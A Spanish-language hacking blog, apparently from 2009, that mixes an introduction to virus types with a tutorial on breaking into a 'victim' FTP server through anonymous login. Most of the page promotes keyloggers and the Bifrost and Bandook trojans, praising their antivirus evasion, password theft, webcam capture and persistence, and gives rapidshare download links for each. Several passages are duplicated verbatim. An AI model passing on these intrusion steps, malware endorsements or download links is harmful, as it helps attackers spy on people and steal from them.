Hola a todos ^^ Antes de empezar el Tercer tutorial me gustaria darles a ententer que es un "Virus" y sus Tipos:
Virus:
Un virus informático es un programa de computadora que tiene la capacidad de causar daño y su característica más relevante es que puede replicarse a sí mismo y propagarse a otras computadoras. Infecta "entidades ejecutables": cualquier archivo o sector de las unidades de almacenamiento que contenga códigos de instrucción que el procesador valla a ejecutar. Se programa en lenguaje ensamblador y por lo tanto, requiere algunos conocimientos del funcionamiento interno de la computadora.
Gusano o Worm:
Es un Tipo de Virus o programas que tratan de reproducirse a si mismo, no produciendo efectos destructivos sino el fin de dicho programa es colapsar el sistema o ancho de banda replicandose a si mismo
Caballos de Troya o Camaleones:
Son programas que permanecen en el sistema, no ocasionando acciones destructivas sino todo lo contrario suele capturar datos generalmente password enviándolos a otro sitio, o dejar indefenso el ordenador donde se ejecuta, abriendo agujeros en la seguridad del sistema, con la siguiente profanación de nuestros datos.
El caballo de troya incluye el código maligno en el programa benigno, mientras que los camaleones crean uno nuevo programa y se añade el código maligno.
Joke Program:
Simplemente tienen un payload (imagen o sucesión de estas) y suelen destruir datos.
Bombas Logicas o de Tiempo:
Programas que se activan al producirse un acontecimiento determinado. la condición suele ser una fecha (Bombas de Tiempo), una combinación de teclas, o un estilo técnico Bombas Lógicas), etc... Si no se produce la condición permanece oculto al usuario.
Retro Virus:
Este programa busca cualquier antivirus, localiza un bug (fallo) dentro del antivirus y normalmente lo destruye.
Con esto espero darles a todos a entender que tipos de virus hay no? pero que metodos de contagio existen?
Existen dos grandes clases de contagio. En la primera, el usuario, en un momento dado, ejecuta o acepta de forma inadvertida la instalación del virus. En la segunda, el programa malicioso actúa replicándose a través de las redes. En este caso se habla de gusanos.
En cualquiera de los dos casos, el sistema operativo infectado comienza a sufrir una serie de comportamientos anómalos o imprevistos. Dichos comportamientos pueden dar una pista del problema y permitir la recuperación del mismo.
Dentro de las contaminaciones más frecuentes por interacción del usuario están las siguientes:
* Mensajes que ejecutan automáticamente programas (como el programa de correo que abre directamente un archivo adjunto).
* Ingeniería social, mensajes como ejecute este programa y gane un premio.
* Entrada de información en discos de otros usuarios infectados.
* Instalación de software pirata o de baja calidad.
En el sistema Windows puede darse el caso de que el ordenador pueda infectarse sin ningún tipo de intervención del usuario (versiones Windows 2000, XP y Server 2003) por virus como Blaster, Sasser y sus variantes, por el simple hecho de estar, la máquina conectada a una red o a Internet. Este tipo de virus aprovechan una vulnerabilidad de desbordamiento de búfer y puertos de red para infiltrarse y contagiar el equipo, causar inestabilidad en el sistema, mostrar mensajes de error y hasta reinicios involuntarios, reenviarse a otras máquinas mediante la red local o Internet, entre otros daños. En las últimas versiones de Windows 2000, XP y Server 2003 se ha corregido este problema en su mayoría. De manera frecuente, el usuario deberá descargar actualizaciones y parches de seguridad.
Entendido? Pues con esto termino esta introduccion a los Virus y el siguiente tutorial
viernes, 2 de enero de 2009
Intrusion por FTP by Rario
Bueno aqui este metodo no aveces no funciona pero intentando todo sale ^^
cuando empezastes a leer ya debes de tener unas cuantas victimas no? Cada
quien tiene su motivo pero empezemos el segundo tutorial de infiltracion:
Como se supone que todos sabemos la shell de windows es el Command.com
o CMD ahora lo abrimos y demosle un color "A" por que asi me gusta mas =P
Listo? Color A? Ahora como va a ser una Intrusion por ftp tecleamos algo asi:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
FTP www.victima.com
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Te va a salir un mensaje del host del server al que se esta conectando
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Ahora conectado te pedira que te logues con un Username y password
Pero como Chingados voy a conseguir el user y la pass? algo asi estan pensando no?
pues la respuesta un simple bug de oro ^^ es entrar como r00t metiendonos como
Anonymous:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
User (victima.com:(none)): anonymous
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Si te sale algo asi:
331 anonymous login ok, send your complete email adress as your password.
Password:
Casi siempre significa que el Login es correcto pero Dice que metas el correo como pass?!
Entonces metamos nuestro correo ^-^... Intenten con correos como Webmaster@victima.com
Capiche?
NOTA: Al Colocar la Password no se muestran "*" Ni nada de esas cosas en cambio no se ve para que no te vayas a asustar por cierto @=alt+64
cuando empezastes a leer ya debes de tener unas cuantas victimas no? Cada
quien tiene su motivo pero empezemos el segundo tutorial de infiltracion:
Como se supone que todos sabemos la shell de windows es el Command.com
o CMD ahora lo abrimos y demosle un color "A" por que asi me gusta mas =P
Listo? Color A? Ahora como va a ser una Intrusion por ftp tecleamos algo asi:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
FTP www.victima.com
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Te va a salir un mensaje del host del server al que se esta conectando
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Ahora conectado te pedira que te logues con un Username y password
Pero como Chingados voy a conseguir el user y la pass? algo asi estan pensando no?
pues la respuesta un simple bug de oro ^^ es entrar como r00t metiendonos como
Anonymous:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
User (victima.com:(none)): anonymous
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Si te sale algo asi:
331 anonymous login ok, send your complete email adress as your password.
Password:
Casi siempre significa que el Login es correcto pero Dice que metas el correo como pass?!
Entonces metamos nuestro correo ^-^... Intenten con correos como Webmaster@victima.com
Capiche?
NOTA: Al Colocar la Password no se muestran "*" Ni nada de esas cosas en cambio no se ve para que no te vayas a asustar por cierto @=alt+64
Keyloggers
Los KeyLoggers son sistema de seguimiento de la actividad del teclado,con el que podremos registrar cualquier cosa que se escriba en el ordenador y varios aspectos relacionados con esas entradas.
Las opciones que incluyen son muy numerosas y útiles, convirtiéndose en unos sistemas de vigilancia casi implacable. A sus funciones de "keylogger" hay que sumarle las interesantísimas funciones de recordar tiempos y momentos de la apertura de las ventanas en las que se escribió y, además, la posibilidad de diferenciar caracteres especiales de los diferentes idiomas. En cuanto a las opciones que incluye hay que mencionar que puede capturar pantallas, mantenerse oculto, soporte de contraseña (al instalarse nos dan una de inicio), aviso inmediato por correo al detectar cierto texto escrito, envío de logs (el historial) mediante correo electrónico, mensajes de alerta predefinibles, etc.
Sin lugar a dudas los Keylogger son un excelente sistema de vigilancia que difícilmente nos podrá defraudar.
KGB Keylogger
Golden Keylogger
Fearless Key Spy
PC-Spy Keylogger
Las opciones que incluyen son muy numerosas y útiles, convirtiéndose en unos sistemas de vigilancia casi implacable. A sus funciones de "keylogger" hay que sumarle las interesantísimas funciones de recordar tiempos y momentos de la apertura de las ventanas en las que se escribió y, además, la posibilidad de diferenciar caracteres especiales de los diferentes idiomas. En cuanto a las opciones que incluye hay que mencionar que puede capturar pantallas, mantenerse oculto, soporte de contraseña (al instalarse nos dan una de inicio), aviso inmediato por correo al detectar cierto texto escrito, envío de logs (el historial) mediante correo electrónico, mensajes de alerta predefinibles, etc.
Sin lugar a dudas los Keylogger son un excelente sistema de vigilancia que difícilmente nos podrá defraudar.
KGB Keylogger
rapidshare.com/files/179136380/KGB_Keylogger_by_Rario.rar
Golden Keylogger
rapidshare.com/files/179136379/Golden_Keylogger_by_Rario.zip
Fearless Key Spy
rapidshare.com/files/179136378/Fearless_KeySpy_v2.0_by_Rario.zip
PC-Spy Keylogger
rapidshare.com/files/179136381/PC-Spy_Keylogger_by_Rario.rar
Bifrost 1.2D
La Version 1.2d del bifrost, supuestamente es una modificacion de la version 1.2c, version privada y oficial creada por KSV, que estaba a la venta por unos 200 dolares.
Alguien se quejo de que la detectaban algunos avs y la publico...
Dentro de todo lo que mas se destaca con respecto a versiones anteriores es el "file manager", se le agregaron muchisimas mejoras.
Tambien el server ahora corre en windows vista 64 bits y es mas indetectable, aunque no creo que dure mucho tiempo
Indetectable a algunos antivirus y a todos los antivirus desactualizados hace unos meses.
Mejorado el sistema de salteo de firewall.
-Mejoras en la gestion de archivos:
Agregado gestor de descargas, permite cancelar, pausar, mover arriba, abajo, etc.
Aumentada la velocidad y estabilidad de las descargas.
Guarda datos en cache.
Permite ver vistas en miniaturas en imagenes jpg.
Agregada opcion para disminuir la velocidad de descarga asi se aumenta el ancho de banda.
Agregada opcion para reproducir sonidos con volumen maximo y por defecto.
Agregada vista "Treeview"
-Otras mejoras
El server corre en windows vista 64 bits, aunque el keylogger todabia sigue sin funcionar en este SO.
Agregada captura del clipboard en el keylogger.
Mejorada la estabilidad en el metodo de inicio activex.
Nueva columna en el cliente que muestra la ventana activa en cada victima.
Los datos de antivirus y firewall se extraen del centro de seguridad de windows.
Agregada funcion para captura de password de firefox 2.
http://rapidshare.com/files/178959913/Bifrost_1.2d_by_Rario.rar
Bandook 1.36
Esta es una version privada del famoso y buen troyano Bandook, aca se las dejo, tiene nuevas funciones...
Cambios en Bandook 1.36:
- Banderas relacionados con Clientes Países En la lista de conexiones
VNC-fijo extensión
- Cargas utiliza FTP en modo pasivo ahora
- Instalación fija en Vista y Persistencia
- Cambio de Información [Añadido informe completo, Red de Información, Driver Info, Información de Procesos, etc ..]
- Añadido Puertos Monitor [Mostrar Conexión y Puertos y la lista de entrada]
PWS-fijo Plugin para el trabajo en Vista, IE 7 se agregó Retreiving Capacidad Contraseñas, contraseñas Plugins Actualizado a versiones más recientes
- Screen Recorder fijo en Vista, y fijo Raring El Cine en Dirs que contengan espacios
- Añadida función de actualización Web, Web Actualización de masas, selección y actualización de la web [Añadido en "Otros" submenu]
- Añadida función de actualización directa, ahora puede actualizar u ur Server persistencia incluso cuando está activada
- Eliminar opción funciona perfectamente ahora, con persistencia y sin permitido
- Subir fijo en Gestor de archivos (se Guardar como apertura en lugar de Open File)
- Captura de pantalla fija, Cam, Keylogger en XP modificaciones después de Vista
- Se ha corregido un error con Keylogs Subir Configuración automática de lectura / Aplicando
Keylogger-Obras en Windows Vista ahora
- Imágenes / Cam Shots trabaja ahora en un número limitado de cuentas
- Servidor de FTP fija en Vista
- Corregido un error en Tiny Archivo Raring que estaba haciendo de archivos rar No
- Plugins ahora instalado en la carpeta Bandook (obras en un número limitado de cuentas)
- Nuevo método de instalación
- Bandook obras en Cuentas de usuario limitada ahora
persistencia de actualización por lo que trabaja ahora en Vista
Bandook-install / Pistas silenciosamente en Vista
- Vista Compatibilidad fijo [no funcionaba en lo absoluto]
- Añadido Network Manager con soporte para Unicode (señalará acciones, la descarga, carga, Borrar)
Multi-Language Interface, Bandook ahora es traducible a ur la Lengua Materna
Cambios en Bandook 1.36:
- Banderas relacionados con Clientes Países En la lista de conexiones
VNC-fijo extensión
- Cargas utiliza FTP en modo pasivo ahora
- Instalación fija en Vista y Persistencia
- Cambio de Información [Añadido informe completo, Red de Información, Driver Info, Información de Procesos, etc ..]
- Añadido Puertos Monitor [Mostrar Conexión y Puertos y la lista de entrada]
PWS-fijo Plugin para el trabajo en Vista, IE 7 se agregó Retreiving Capacidad Contraseñas, contraseñas Plugins Actualizado a versiones más recientes
- Screen Recorder fijo en Vista, y fijo Raring El Cine en Dirs que contengan espacios
- Añadida función de actualización Web, Web Actualización de masas, selección y actualización de la web [Añadido en "Otros" submenu]
- Añadida función de actualización directa, ahora puede actualizar u ur Server persistencia incluso cuando está activada
- Eliminar opción funciona perfectamente ahora, con persistencia y sin permitido
- Subir fijo en Gestor de archivos (se Guardar como apertura en lugar de Open File)
- Captura de pantalla fija, Cam, Keylogger en XP modificaciones después de Vista
- Se ha corregido un error con Keylogs Subir Configuración automática de lectura / Aplicando
Keylogger-Obras en Windows Vista ahora
- Imágenes / Cam Shots trabaja ahora en un número limitado de cuentas
- Servidor de FTP fija en Vista
- Corregido un error en Tiny Archivo Raring que estaba haciendo de archivos rar No
- Plugins ahora instalado en la carpeta Bandook (obras en un número limitado de cuentas)
- Nuevo método de instalación
- Bandook obras en Cuentas de usuario limitada ahora
persistencia de actualización por lo que trabaja ahora en Vista
Bandook-install / Pistas silenciosamente en Vista
- Vista Compatibilidad fijo [no funcionaba en lo absoluto]
- Añadido Network Manager con soporte para Unicode (señalará acciones, la descarga, carga, Borrar)
Multi-Language Interface, Bandook ahora es traducible a ur la Lengua Materna
http://rapidshare.com/files/178959912/Bandook_1.36_by_Rario.rar
SSS 7.97
Shadow Security Scanner es un completísimo y efectivo escáner de vulnerabilidades para la plataforma de Windows nativa, aunque también examina servidores de cualquier otra plataforma revelando brechas en Unix, Linux, FreeBSD, OpenBSD y Net BSD.
Por su arquitectura, Shadow Security Scanner también descubre fallos en CISCO, HP y otros equipos de la red. Actualmente, los servicios analizados son: FTP, SSH, Telnet, SMTP, DNS, Finger, HTTP, POP3, IMAP, IRC, Windows Media Service, Terminal Service, NetBIOS, NFS, NNTP, SNMP, Squid, LDAP, HTTPS, SSL, TCP/IP, UDP y servicios del Registro.
Lo análisis son muy rápidos y se ofrecen informes de cada una de las vulnerabilidades y sus posibles soluciones, además de actualizarse automáticamente a través de Internet.
http://rapidshare.com/files/178942516/SSS_7.97_by_Rario.rar
Suscribirse a:
Entradas (Atom)
